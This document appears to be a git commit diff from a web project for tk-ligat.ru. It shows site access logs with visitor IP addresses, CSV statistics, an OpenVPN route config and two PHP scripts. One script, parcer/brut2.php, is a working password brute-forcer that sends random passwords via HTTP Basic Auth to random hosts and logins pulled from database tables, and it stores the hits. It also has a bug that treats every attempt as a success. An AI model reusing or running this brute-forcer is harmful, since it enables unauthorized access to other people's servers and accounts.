46.165.16.184;1675179171;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675179182;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/6-1.html;
46.165.16.184;1675179192;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/5-1.html;
46.165.16.184;1675179202;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/51-1.html;
46.165.16.184;1675179211;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/61-1.html;
46.165.16.184;1675179252;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/61-2.html;
46.165.16.184;1675179264;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/72-1.html;
46.165.16.184;1675181938;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/21923;
46.165.16.184;1675189035;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/21923;
1 178.46.124.58 1675150440 Chrome 10+ Windows https://tk-ligat.ru/
2 178.46.124.58 1675150460 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/0-1.html
3 46.165.16.184 1675174532 Firefox 10+ Linux https://tk-ligat.ru/
4 46.165.16.184 1675179171 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-1.html
5 46.165.16.184 1675179182 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/6-1.html
6 46.165.16.184 1675179192 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/5-1.html
7 46.165.16.184 1675179202 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/51-1.html
8 46.165.16.184 1675179211 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/61-1.html
9 46.165.16.184 1675179252 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/61-2.html
10 46.165.16.184 1675179264 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/72-1.html
11 46.165.16.184 1675181938 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/21923
12 46.165.16.184 1675189035 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/21923

View File

@ -1 +1 @@
1674631655 1675263137
1 1674631655 1675263137

View File

@ -1,163 +1,178 @@
1673298000;10;1;3; 1675371600;11;2;;03.02.2023.csv;
1657832400;2;2;2; 1673298000;10;1;;10.01.2023.csv;
1662411600;1;1;1; 1675803600;5;1;;08.02.2023.csv;
1673643600;50;3;3; 1657832400;2;2;;15.07.2022.csv;
1664571600;2;2;2; 1662411600;1;1;;06.09.2022.csv;
1660338000;1;1;1; 1673643600;50;3;;14.01.2023.csv;
1674421200;2;1;1; 1664571600;2;2;;01.10.2022.csv;
1674334800;42;1;1; 1660338000;1;1;;13.08.2022.csv;
1662584400;2;2;2; 1674421200;2;1;;23.01.2023.csv;
1671570000;43;4;3; 1674334800;42;1;;22.01.2023.csv;
1666386000;13;2;2; 1662584400;2;2;;08.09.2022.csv;
1673211600;129;5;3; 1671570000;43;4;;21.12.2022.csv;
1665867600;3;2;2; 1666386000;13;2;;22.10.2022.csv;
1662498000;5;5;4; 1673211600;129;5;;09.01.2023.csv;
1661202000;5;3;3; 1665867600;3;2;;16.10.2022.csv;
1671310800;10;2;2; 1662498000;5;5;;07.09.2022.csv;
1670878800;7;3;3; 1661202000;5;3;;23.08.2022.csv;
1658350800;1;1;1; 1671310800;10;2;;18.12.2022.csv;
1662843600;7;2;3; 1670878800;7;3;;13.12.2022.csv;
1672952400;197;7;10; 1658350800;1;1;;21.07.2022.csv;
1666126800;5;2;2; 1662843600;7;2;;11.09.2022.csv;
1671051600;45;3;2; 1672952400;197;7;;06.01.2023.csv;
1660597200;14;2;2; 1666126800;5;2;;19.10.2022.csv;
1671915600;176;3;4; 1671051600;45;3;;15.12.2022.csv;
1657314000;3;2;2; 1660597200;14;2;;16.08.2022.csv;
1671742800;2;1;1; 1671915600;176;3;;25.12.2022.csv;
1666818000;1;1;1; 1674680400;11;5;;26.01.2023.csv;
1661029200;18;3;3; 1657314000;3;2;;09.07.2022.csv;
1660251600;1;1;1; 1671742800;2;1;;23.12.2022.csv;
1656277200;10;5;4; 1666818000;1;1;;27.10.2022.csv;
1674162000;6;5;3; 1661029200;18;3;;21.08.2022.csv;
1663621200;10;6;5; 1674766800;16;5;;27.01.2023.csv;
1658091600;2;2;2; 1660251600;1;1;;12.08.2022.csv;
1671483600;67;3;2; 1656277200;10;5;;27.06.2022.csv;
1672434000;50;2;2; 1674162000;6;5;;20.01.2023.csv;
1656968400;15;4;4; 1663621200;10;6;;20.09.2022.csv;
1672088400;240;3;4; 1675026000;6;6;;30.01.2023.csv;
1673816400;33;1;1; 1658091600;2;2;;18.07.2022.csv;
1657400400;2;2;2; 1671483600;67;3;;20.12.2022.csv;
1673384400;66;3;3; 1672434000;50;2;;31.12.2022.csv;
1660078800;1;1;1; 1656968400;15;4;;05.07.2022.csv;
1660165200;2;2;2; 1672088400;240;3;;27.12.2022.csv;
1657141200;15;4;4; 1673816400;33;1;;16.01.2023.csv;
1673902800;11;4;4; 1657400400;2;2;;10.07.2022.csv;
1657746000;2;2;2; 1673384400;66;3;;11.01.2023.csv;
1671829200;45;4;3; 1660078800;1;1;;10.08.2022.csv;
1665954000;2;1;1; 1660165200;2;2;;11.08.2022.csv;
1674248400;15;6;3; 1657141200;15;4;;07.07.2022.csv;
1660510800;15;6;4; 1673902800;11;4;;17.01.2023.csv;
1661806800;4;4;4; 1657746000;2;2;;14.07.2022.csv;
1658005200;2;2;2; 1671829200;45;4;;24.12.2022 (conflicted copy 2022-12-24 194548).csv;
1659992400;1;1;1; 1665954000;2;1;;17.10.2022.csv;
1666299600;6;2;2; 1674248400;15;6;;21.01.2023.csv;
1672866000;74;5;6; 1660510800;15;6;;15.08.2022.csv;
1666645200;3;3;3; 1661806800;4;4;;30.08.2022.csv;
1661374800;6;3;4; 1658005200;2;2;;17.07.2022.csv;
1662066000;3;3;2; 1659992400;1;1;;09.08.2022.csv;
1656363600;9;4;4; 1666299600;6;2;;21.10.2022.csv;
1656622800;1;1;1; 1672866000;74;5;;05.01.2023.csv;
1663362000;1;1;1; 1666645200;3;3;;25.10.2022.csv;
1672174800;177;3;5; 1661374800;6;3;;25.08.2022.csv;
1672261200;84;3;5; 1662066000;3;3;;02.09.2022.csv;
1664226000;3;1;1; 1656363600;9;4;;28.06.2022.csv;
1659301200;2;2;2; 1656622800;1;1;;01.07.2022.csv;
1667250000;1;1;1; 1663362000;1;1;;17.09.2022.csv;
1663880400;9;2;1; 1674939600;4;2;;29.01.2023.csv;
1659214800;1;1;1; 1672174800;177;3;;28.12.2022.csv;
1664744400;1;1;1; 1672261200;84;3;;29.12.2022.csv;
1659646800;2;2;2; 1664226000;3;1;;27.09.2022.csv;
1663707600;2;1;1; 1659301200;2;2;;01.08.2022.csv;
1657227600;3;3;3; 1667250000;1;1;;01.11.2022.csv;
1673989200;6;2;2; 1663880400;9;2;;23.09.2022.csv;
1661547600;2;2;2; 1659214800;1;1;;31.07.2022.csv;
1656795600;56;1;1; 1664744400;1;1;;03.10.2022.csv;
1659560400;1;1;1; 1659646800;2;2;;05.08.2022.csv;
1672002000;120;2;5; 1663707600;2;1;;21.09.2022.csv;
1665176400;6;1;1; 1657227600;3;3;;08.07.2022.csv;
1662152400;2;2;2; 1673989200;6;2;;18.01.2023.csv;
1671829200;9;4;3; 1661547600;2;2;;27.08.2022.csv;
1674075600;46;5;3; 1656795600;56;1;;03.07.2022.csv;
1661893200;1;1;1; 1659560400;1;1;;04.08.2022.csv;
1663189200;2;2;2; 1672002000;120;2;;26.12.2022.csv;
1656882000;2;2;2; 1665176400;6;1;;08.10.2022.csv;
1670965200;2;1;1; 1662152400;2;2;;03.09.2022.csv;
1672520400;228;2;3; 1671829200;9;4;;24.12.2022.csv;
1660424400;1;1;1; 1674075600;46;5;;19.01.2023.csv;
1658955600;1;1;1; 1661893200;1;1;;31.08.2022.csv;
1673125200;20;5;6; 1663189200;2;2;;15.09.2022.csv;
1659042000;1;1;1; 1656882000;2;2;;04.07.2022.csv;
1658610000;1;1;1; 1670965200;2;1;;14.12.2022.csv;
1662325200;2;2;2; 1672520400;228;2;;01.01.2023.csv;
1666472400;13;3;3; 1660424400;1;1;;14.08.2022.csv;
1658696400;1;1;1; 1658955600;1;1;;28.07.2022.csv;
1659387600;1;1;1; 1673125200;20;5;;08.01.2023.csv;
1666904400;7;4;4; 1659042000;1;1;;29.07.2022.csv;
1657918800;1;1;1; 1658610000;1;1;;24.07.2022.csv;
1667336400;3;1;1; 1662325200;2;2;;05.09.2022.csv;
1656450000;2;2;2; 1666472400;13;3;;23.10.2022.csv;
1658782800;3;3;2; 1658696400;1;1;;25.07.2022.csv;
1672693200;147;4;8; 1659387600;1;1;;02.08.2022.csv;
1673557200;2;1;1; 1675198800;5;2;;01.02.2023.csv;
1663102800;1;1;1; 1666904400;7;4;;28.10.2022.csv;
1659474000;1;1;1; 1657918800;1;1;;16.07.2022.csv;
1660683600;15;4;4; 1667336400;3;1;;02.11.2022.csv;
1658178000;1;1;1; 1656450000;2;2;;29.06.2022.csv;
1656190800;7;1;1; 1658782800;3;3;;26.07.2022.csv;
1663534800;269;5;5; 1672693200;147;4;;03.01.2023.csv;
1660942800;1;1;1; 1673557200;2;1;;13.01.2023.csv;
1673470800;12;4;2; 1663102800;1;1;;14.09.2022.csv;
1665781200;16;13;5; 1659474000;1;1;;03.08.2022.csv;
1671656400;8;5;4; 1660683600;15;4;;17.08.2022.csv;
1661115600;1;1;1; 1658178000;1;1;;19.07.2022.csv;
1671397200;193;5;6; 1656190800;7;1;;26.06.2022.csv;
1664398800;1;1;1; 1663534800;269;5;;19.09.2022.csv;
1661461200;2;2;2; 1660942800;1;1;;20.08.2022.csv;
1657054800;7;4;3; 1673470800;12;4;;12.01.2023.csv;
1665262800;9;1;1; 1665781200;16;13;;15.10.2022.csv;
1657573200;1;1;1; 1671656400;8;5;;22.12.2022.csv;
1659906000;1;1;1; 1661115600;1;1;;22.08.2022.csv;
1673038800;61;1;5; 1671397200;193;5;;19.12.2022.csv;
1663016400;3;3;3; 1664398800;1;1;;29.09.2022.csv;
1665694800;2;2;2; 1661461200;2;2;;26.08.2022.csv;
1673730000;164;1;1; 1657054800;7;4;;06.07.2022.csv;
1665349200;3;2;2; 1665262800;9;1;;09.10.2022.csv;
1658523600;2;2;2; 1657573200;1;1;;12.07.2022.csv;
1666213200;3;1;1; 1659906000;1;1;;08.08.2022.csv;
1665608400;1;1;1; 1673038800;61;1;;07.01.2023.csv;
1667077200;6;2;2; 1663016400;3;3;;13.09.2022.csv;
1660770000;1;1;1; 1665694800;2;2;;14.10.2022.csv;
1662930000;7;4;4; 1673730000;164;1;;15.01.2023.csv;
1671224400;295;1;1; 1665349200;3;2;;10.10.2022.csv;
1659128400;1;1;1; 1658523600;2;2;;23.07.2022.csv;
1663275600;3;3;3; 1666213200;3;1;;20.10.2022.csv;
1661979600;1;1;1; 1665608400;1;1;;13.10.2022.csv;
1662238800;1;1;1; 1667077200;6;2;;30.10.2022.csv;
1667509200;1;1;1; 1660770000;1;1;;18.08.2022.csv;
1666731600;1;1;1; 1662930000;7;4;;12.09.2022.csv;
1662670800;1;1;1; 1671224400;295;1;;17.12.2022.csv;
1661288400;5;3;2; 1659128400;1;1;;30.07.2022.csv;
1661720400;2;1;1; 1675112400;12;2;;31.01.2023.csv;
1659819600;3;3;2; 1663275600;3;3;;16.09.2022.csv;
1659733200;1;1;1; 1661979600;1;1;;01.09.2022.csv;
1671138000;15;4;3; 1662238800;1;1;;04.09.2022.csv;
1663448400;4;2;2; 1667509200;1;1;;04.11.2022.csv;
1658869200;1;1;1; 1666731600;1;1;;26.10.2022.csv;
1666558800;2;1;1; 1662670800;1;1;;09.09.2022.csv;
1667422800;2;2;2; 1675458000;246;7;;04.02.2023.csv;
1672606800;99;8;6; 1661288400;5;3;;24.08.2022.csv;
1672779600;450;6;6; 1674853200;4;1;;28.01.2023.csv;
1664053200;2;2;1; 1661720400;2;1;;29.08.2022.csv;
1665090000;24;3;3; 1675285200;58;3;;02.02.2023.csv;
1657659600;5;5;4; 1659819600;3;3;;07.08.2022.csv;
1664312400;6;3;3; 1659733200;1;1;;06.08.2022.csv;
1662757200;1;1;1; 1671138000;15;4;;16.12.2022.csv;
1665003600;1;1;1; 1663448400;4;2;;18.09.2022.csv;
1660856400;6;6;3; 1675717200;5;1;;07.02.2023.csv;
1658437200;5;4;1; 1658869200;1;1;;27.07.2022.csv;
1656709200;21;3;3; 1666558800;2;1;;24.10.2022.csv;
1672347600;13;2;4; 1667422800;2;2;;03.11.2022.csv;
1656536400;2;2;2; 1672606800;99;8;;02.01.2023.csv;
1666040400;2;2;1; 1672779600;450;6;;04.01.2023.csv;
1657486800;3;3;3; 1664053200;2;2;;25.09.2022.csv;
1664139600;6;4;4; 1665090000;24;3;;07.10.2022.csv;
1657659600;5;5;;13.07.2022.csv;
1664312400;6;3;;28.09.2022.csv;
1662757200;1;1;;10.09.2022.csv;
1665003600;1;1;;06.10.2022.csv;
1660856400;6;6;;19.08.2022.csv;
1675544400;132;5;;05.02.2023.csv;
1658437200;5;4;;22.07.2022.csv;
1656709200;21;3;;02.07.2022.csv;
1672347600;13;2;;30.12.2022.csv;
1675630800;48;4;;06.02.2023.csv;
1674594000;1;1;;25.01.2023.csv;
1656536400;2;2;;30.06.2022.csv;
1666040400;2;2;;18.10.2022.csv;
1657486800;3;3;;11.07.2022.csv;
1664139600;6;4;;26.09.2022.csv;

1 1673298000 1675371600 10 11 1 2 3 03.02.2023.csv
2 1657832400 1673298000 2 10 2 1 2 10.01.2023.csv
3 1662411600 1675803600 1 5 1 1 1 08.02.2023.csv
4 1673643600 1657832400 50 2 3 2 3 15.07.2022.csv
5 1664571600 1662411600 2 1 2 1 2 06.09.2022.csv
6 1660338000 1673643600 1 50 1 3 1 14.01.2023.csv
7 1674421200 1664571600 2 2 1 2 1 01.10.2022.csv
8 1674334800 1660338000 42 1 1 1 1 13.08.2022.csv
9 1662584400 1674421200 2 2 2 1 2 23.01.2023.csv
10 1671570000 1674334800 43 42 4 1 3 22.01.2023.csv
11 1666386000 1662584400 13 2 2 2 2 08.09.2022.csv
12 1673211600 1671570000 129 43 5 4 3 21.12.2022.csv
13 1665867600 1666386000 3 13 2 2 2 22.10.2022.csv
14 1662498000 1673211600 5 129 5 5 4 09.01.2023.csv
15 1661202000 1665867600 5 3 3 2 3 16.10.2022.csv
16 1671310800 1662498000 10 5 2 5 2 07.09.2022.csv
17 1670878800 1661202000 7 5 3 3 3 23.08.2022.csv
18 1658350800 1671310800 1 10 1 2 1 18.12.2022.csv
19 1662843600 1670878800 7 7 2 3 3 13.12.2022.csv
20 1672952400 1658350800 197 1 7 1 10 21.07.2022.csv
21 1666126800 1662843600 5 7 2 2 2 11.09.2022.csv
22 1671051600 1672952400 45 197 3 7 2 06.01.2023.csv
23 1660597200 1666126800 14 5 2 2 2 19.10.2022.csv
24 1671915600 1671051600 176 45 3 3 4 15.12.2022.csv
25 1657314000 1660597200 3 14 2 2 2 16.08.2022.csv
26 1671742800 1671915600 2 176 1 3 1 25.12.2022.csv
27 1666818000 1674680400 1 11 1 5 1 26.01.2023.csv
28 1661029200 1657314000 18 3 3 2 3 09.07.2022.csv
29 1660251600 1671742800 1 2 1 1 1 23.12.2022.csv
30 1656277200 1666818000 10 1 5 1 4 27.10.2022.csv
31 1674162000 1661029200 6 18 5 3 3 21.08.2022.csv
32 1663621200 1674766800 10 16 6 5 5 27.01.2023.csv
33 1658091600 1660251600 2 1 2 1 2 12.08.2022.csv
34 1671483600 1656277200 67 10 3 5 2 27.06.2022.csv
35 1672434000 1674162000 50 6 2 5 2 20.01.2023.csv
36 1656968400 1663621200 15 10 4 6 4 20.09.2022.csv
37 1672088400 1675026000 240 6 3 6 4 30.01.2023.csv
38 1673816400 1658091600 33 2 1 2 1 18.07.2022.csv
39 1657400400 1671483600 2 67 2 3 2 20.12.2022.csv
40 1673384400 1672434000 66 50 3 2 3 31.12.2022.csv
41 1660078800 1656968400 1 15 1 4 1 05.07.2022.csv
42 1660165200 1672088400 2 240 2 3 2 27.12.2022.csv
43 1657141200 1673816400 15 33 4 1 4 16.01.2023.csv
44 1673902800 1657400400 11 2 4 2 4 10.07.2022.csv
45 1657746000 1673384400 2 66 2 3 2 11.01.2023.csv
46 1671829200 1660078800 45 1 4 1 3 10.08.2022.csv
47 1665954000 1660165200 2 2 1 2 1 11.08.2022.csv
48 1674248400 1657141200 15 15 6 4 3 07.07.2022.csv
49 1660510800 1673902800 15 11 6 4 4 17.01.2023.csv
50 1661806800 1657746000 4 2 4 2 4 14.07.2022.csv
51 1658005200 1671829200 2 45 2 4 2 24.12.2022 (conflicted copy 2022-12-24 194548).csv
52 1659992400 1665954000 1 2 1 1 1 17.10.2022.csv
53 1666299600 1674248400 6 15 2 6 2 21.01.2023.csv
54 1672866000 1660510800 74 15 5 6 6 15.08.2022.csv
55 1666645200 1661806800 3 4 3 4 3 30.08.2022.csv
56 1661374800 1658005200 6 2 3 2 4 17.07.2022.csv
57 1662066000 1659992400 3 1 3 1 2 09.08.2022.csv
58 1656363600 1666299600 9 6 4 2 4 21.10.2022.csv
59 1656622800 1672866000 1 74 1 5 1 05.01.2023.csv
60 1663362000 1666645200 1 3 1 3 1 25.10.2022.csv
61 1672174800 1661374800 177 6 3 3 5 25.08.2022.csv
62 1672261200 1662066000 84 3 3 3 5 02.09.2022.csv
63 1664226000 1656363600 3 9 1 4 1 28.06.2022.csv
64 1659301200 1656622800 2 1 2 1 2 01.07.2022.csv
65 1667250000 1663362000 1 1 1 1 1 17.09.2022.csv
66 1663880400 1674939600 9 4 2 2 1 29.01.2023.csv
67 1659214800 1672174800 1 177 1 3 1 28.12.2022.csv
68 1664744400 1672261200 1 84 1 3 1 29.12.2022.csv
69 1659646800 1664226000 2 3 2 1 2 27.09.2022.csv
70 1663707600 1659301200 2 2 1 2 1 01.08.2022.csv
71 1657227600 1667250000 3 1 3 1 3 01.11.2022.csv
72 1673989200 1663880400 6 9 2 2 2 23.09.2022.csv
73 1661547600 1659214800 2 1 2 1 2 31.07.2022.csv
74 1656795600 1664744400 56 1 1 1 1 03.10.2022.csv
75 1659560400 1659646800 1 2 1 2 1 05.08.2022.csv
76 1672002000 1663707600 120 2 2 1 5 21.09.2022.csv
77 1665176400 1657227600 6 3 1 3 1 08.07.2022.csv
78 1662152400 1673989200 2 6 2 2 2 18.01.2023.csv
79 1671829200 1661547600 9 2 4 2 3 27.08.2022.csv
80 1674075600 1656795600 46 56 5 1 3 03.07.2022.csv
81 1661893200 1659560400 1 1 1 1 1 04.08.2022.csv
82 1663189200 1672002000 2 120 2 2 2 26.12.2022.csv
83 1656882000 1665176400 2 6 2 1 2 08.10.2022.csv
84 1670965200 1662152400 2 2 1 2 1 03.09.2022.csv
85 1672520400 1671829200 228 9 2 4 3 24.12.2022.csv
86 1660424400 1674075600 1 46 1 5 1 19.01.2023.csv
87 1658955600 1661893200 1 1 1 1 1 31.08.2022.csv
88 1673125200 1663189200 20 2 5 2 6 15.09.2022.csv
89 1659042000 1656882000 1 2 1 2 1 04.07.2022.csv
90 1658610000 1670965200 1 2 1 1 1 14.12.2022.csv
91 1662325200 1672520400 2 228 2 2 2 01.01.2023.csv
92 1666472400 1660424400 13 1 3 1 3 14.08.2022.csv
93 1658696400 1658955600 1 1 1 1 1 28.07.2022.csv
94 1659387600 1673125200 1 20 1 5 1 08.01.2023.csv
95 1666904400 1659042000 7 1 4 1 4 29.07.2022.csv
96 1657918800 1658610000 1 1 1 1 1 24.07.2022.csv
97 1667336400 1662325200 3 2 1 2 1 05.09.2022.csv
98 1656450000 1666472400 2 13 2 3 2 23.10.2022.csv
99 1658782800 1658696400 3 1 3 1 2 25.07.2022.csv
100 1672693200 1659387600 147 1 4 1 8 02.08.2022.csv
101 1673557200 1675198800 2 5 1 2 1 01.02.2023.csv
102 1663102800 1666904400 1 7 1 4 1 28.10.2022.csv
103 1659474000 1657918800 1 1 1 1 1 16.07.2022.csv
104 1660683600 1667336400 15 3 4 1 4 02.11.2022.csv
105 1658178000 1656450000 1 2 1 2 1 29.06.2022.csv
106 1656190800 1658782800 7 3 1 3 1 26.07.2022.csv
107 1663534800 1672693200 269 147 5 4 5 03.01.2023.csv
108 1660942800 1673557200 1 2 1 1 1 13.01.2023.csv
109 1673470800 1663102800 12 1 4 1 2 14.09.2022.csv
110 1665781200 1659474000 16 1 13 1 5 03.08.2022.csv
111 1671656400 1660683600 8 15 5 4 4 17.08.2022.csv
112 1661115600 1658178000 1 1 1 1 1 19.07.2022.csv
113 1671397200 1656190800 193 7 5 1 6 26.06.2022.csv
114 1664398800 1663534800 1 269 1 5 1 19.09.2022.csv
115 1661461200 1660942800 2 1 2 1 2 20.08.2022.csv
116 1657054800 1673470800 7 12 4 4 3 12.01.2023.csv
117 1665262800 1665781200 9 16 1 13 1 15.10.2022.csv
118 1657573200 1671656400 1 8 1 5 1 22.12.2022.csv
119 1659906000 1661115600 1 1 1 1 1 22.08.2022.csv
120 1673038800 1671397200 61 193 1 5 5 19.12.2022.csv
121 1663016400 1664398800 3 1 3 1 3 29.09.2022.csv
122 1665694800 1661461200 2 2 2 2 2 26.08.2022.csv
123 1673730000 1657054800 164 7 1 4 1 06.07.2022.csv
124 1665349200 1665262800 3 9 2 1 2 09.10.2022.csv
125 1658523600 1657573200 2 1 2 1 2 12.07.2022.csv
126 1666213200 1659906000 3 1 1 1 1 08.08.2022.csv
127 1665608400 1673038800 1 61 1 1 1 07.01.2023.csv
128 1667077200 1663016400 6 3 2 3 2 13.09.2022.csv
129 1660770000 1665694800 1 2 1 2 1 14.10.2022.csv
130 1662930000 1673730000 7 164 4 1 4 15.01.2023.csv
131 1671224400 1665349200 295 3 1 2 1 10.10.2022.csv
132 1659128400 1658523600 1 2 1 2 1 23.07.2022.csv
133 1663275600 1666213200 3 3 3 1 3 20.10.2022.csv
134 1661979600 1665608400 1 1 1 1 1 13.10.2022.csv
135 1662238800 1667077200 1 6 1 2 1 30.10.2022.csv
136 1667509200 1660770000 1 1 1 1 1 18.08.2022.csv
137 1666731600 1662930000 1 7 1 4 1 12.09.2022.csv
138 1662670800 1671224400 1 295 1 1 1 17.12.2022.csv
139 1661288400 1659128400 5 1 3 1 2 30.07.2022.csv
140 1661720400 1675112400 2 12 1 2 1 31.01.2023.csv
141 1659819600 1663275600 3 3 3 3 2 16.09.2022.csv
142 1659733200 1661979600 1 1 1 1 1 01.09.2022.csv
143 1671138000 1662238800 15 1 4 1 3 04.09.2022.csv
144 1663448400 1667509200 4 1 2 1 2 04.11.2022.csv
145 1658869200 1666731600 1 1 1 1 1 26.10.2022.csv
146 1666558800 1662670800 2 1 1 1 1 09.09.2022.csv
147 1667422800 1675458000 2 246 2 7 2 04.02.2023.csv
148 1672606800 1661288400 99 5 8 3 6 24.08.2022.csv
149 1672779600 1674853200 450 4 6 1 6 28.01.2023.csv
150 1664053200 1661720400 2 2 2 1 1 29.08.2022.csv
151 1665090000 1675285200 24 58 3 3 3 02.02.2023.csv
152 1657659600 1659819600 5 3 5 3 4 07.08.2022.csv
153 1664312400 1659733200 6 1 3 1 3 06.08.2022.csv
154 1662757200 1671138000 1 15 1 4 1 16.12.2022.csv
155 1665003600 1663448400 1 4 1 2 1 18.09.2022.csv
156 1660856400 1675717200 6 5 6 1 3 07.02.2023.csv
157 1658437200 1658869200 5 1 4 1 1 27.07.2022.csv
158 1656709200 1666558800 21 2 3 1 3 24.10.2022.csv
159 1672347600 1667422800 13 2 2 2 4 03.11.2022.csv
160 1656536400 1672606800 2 99 2 8 2 02.01.2023.csv
161 1666040400 1672779600 2 450 2 6 1 04.01.2023.csv
162 1657486800 1664053200 3 2 3 2 3 25.09.2022.csv
163 1664139600 1665090000 6 24 4 3 4 07.10.2022.csv
164 1657659600 5 5 13.07.2022.csv
165 1664312400 6 3 28.09.2022.csv
166 1662757200 1 1 10.09.2022.csv
167 1665003600 1 1 06.10.2022.csv
168 1660856400 6 6 19.08.2022.csv
169 1675544400 132 5 05.02.2023.csv
170 1658437200 5 4 22.07.2022.csv
171 1656709200 21 3 02.07.2022.csv
172 1672347600 13 2 30.12.2022.csv
173 1675630800 48 4 06.02.2023.csv
174 1674594000 1 1 25.01.2023.csv
175 1656536400 2 2 30.06.2022.csv
176 1666040400 2 2 18.10.2022.csv
177 1657486800 3 3 11.07.2022.csv
178 1664139600 6 4 26.09.2022.csv

3
derbacheva-kassa Executable file
View File

@ -0,0 +1,3 @@
ifconfig-push 172.16.0.136 255.255.0.0
push "route 172.16.0.0 255.255.0.0"
#push "route 192.168.0.0 255.255.255.0"

Binary file not shown.

3327
parcer/1.html Normal file

File diff suppressed because one or more lines are too long

114
parcer/brut2.php Normal file
View File

@ -0,0 +1,114 @@
<?php
$_SERVER['SERVER_NAME']='tk-ligat.ru';
require_once('/home/cloud/core/set/tk-ligat.ru.php');
require_once('/home/cloud/core/api/php/db.php');
require_once('/home/cloud/core/api/php/json.php');
//генерируем случайный набор символов случайной длины
function gen_random($minlen, $maxlen){
//делаем случайную длину
$len=rand($minlen, $maxlen);
$arr = array(
//'!', '@', '#', '$', '%', '^', '&', '*', '(', ')',
//'А', 'Б', 'В', 'Г', 'Д', 'Е', 'Ё', 'Ж', 'З', 'И', 'Й', 'К', 'Л', 'М', 'Н', 'О', 'П', 'Р', 'С', 'Т', 'У', 'Ф', 'Х', 'Ц', 'Ч', 'Ш', 'Щ', 'Ъ', 'Ы', 'Ь', 'Э', 'Ю', 'Я',
//'а', 'б', 'в', 'г', 'д', 'е', 'ё', 'х', 'з', 'и', 'й', 'к', 'л', 'м', 'н', 'о', 'п', 'р', 'с', 'т', 'у', 'ф', 'х', 'ц', 'ч', 'ш', 'щ', 'ъ', 'ы', 'ь', 'э', 'ю', 'я',
'A', 'B', 'C', 'D', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'R', 'S', 'T', 'U', 'V', 'X', 'Y', 'Z',
//'a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','r','s','t','u','v','x','y','z',
'1','2','3','4','5','6','7','8','9','0');
$pass = "";
for($i = 0; $i < $len; $i++){
$index = rand(0, count($arr) - 1);
$pass .= $arr[$index];}
return $pass;
}
/* ищет str в txt если находит, возвращает единичку */
function findtxt($txt, $str){
$pos1 = stripos($txt, $str);
if ($pos1 === false) return 0;
else
return 1;
}
function brut($login='admin', $pwd=123, $host='localhost'){
$url = $host; // url, на который отправляется запрос
$post_data = [ // поля нашего запроса
'field1' => 'val_1',
'field2' => 'val_2',
];
$headers = [
"Authorization: Basic " . base64_encode($login . ":" . $pwd) . "\r\n"
]; // заголовки запроса
$post_data = http_build_query($post_data);
$curl = curl_init();
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($curl, CURLOPT_TIMEOUT, 10); //timeout in seconds
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_VERBOSE, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_POST, true); // true - означает, что отправляется POST запрос
$result = trim(curl_exec($curl));
$http_code = curl_getinfo($curl, CURLINFO_RESPONSE_CODE);
$res['http']=$http_code;
//echo $http_code;
if (findtxt($http_code, '401')==1) $res['res']='bad';
if (findtxt($http_code, '200')==1) $res['res']='good';
return $res;
//if ($result=='Unauthorized') return 'bad'; else return 'good';
}
for($i = 0; $i < 1500; $i++){
$password = gen_random(5, 15);
//Берем рандомный хост
$host = DB::getValue( 'SELECT `host` FROM `brut_hosts` ORDER BY RAND() LIMIT 1');
//Берем рандомный login
$login = DB::getValue( 'SELECT `login` FROM `brut_logins` ORDER BY RAND() LIMIT 1');
//узнаем буртили ли такой пароль...
$id1=DB::getValue("SELECT `id` FROM `brut_pwd` WHERE `pwd`=?", $password);
if (!$id1)DB::add("INSERT INTO `brut_pwd` (`pwd`, `md5`) VALUES(?, ?)", array($password, md5($password)));
$id=DB::getValue("SELECT `id` FROM `brut_bad_pwd` WHERE `host`=? AND `login`=? AND `pwd`=?", array($host, $login, $password));
if (!$id){
$res=brut($login, $password, $host);
if ($res['res']='good') {
DB::add("INSERT INTO `brut_good` (`host`, `login`, `pwd`) VALUES(?, ?, ?)", array($host, $login, $password));
die('pwd: ' . $password);
}else{
if ($res['http'])DB::add("INSERT INTO `brut_bad_pwd` (`host`, `login`, `pwd`, `http`) VALUES(?, ?, ?, ?)", array($host, $login, $password, $res['http']));
}
}
unset($id);
}
?>

71
parcer/desnet.php Executable file
View File

@ -0,0 +1,71 @@
<?php
$_SERVER['SERVER_NAME']='tk-ligat.ru';
require_once('/home/cloud/core/set/tk-ligat.ru.php');
require_once('/home/cloud/core/api/php/db.php');
require_once('/home/cloud/core/api/php/json.php');
function leopak ($text) {
$old1 = array("\\");
$new1 = array("/");
$text = str_replace($old1, $new1, $text);
return $text;
}
/* ищет str в txt если находит, возвращает единичку */
function findtxt($txt, $str){
$pos1 = stripos($txt, $str);
if ($pos1 === false) return 0;
else
return 1;
}
function add_link($html){
preg_match_all("/<[Aa][\s]{1}[^>]*[Hh][Rr][Ee][Ff][^=]*=[ '\"\s]*([^ \"'>\s#]+)[^>]*>/", $html, $matches);
$urls = $matches[1]; // Берём то место, где сама ссылка (благодаря группирующим скобкам в регулярном выражении)
/* Выводим все ссылки */
for ($j = 0; $j < count($urls); $j++){
$link=$urls[$j];
if (findtxt($link, 'https://www.deznet.ru')==0) $link = 'https://www.deznet.ru' . leopak($link);
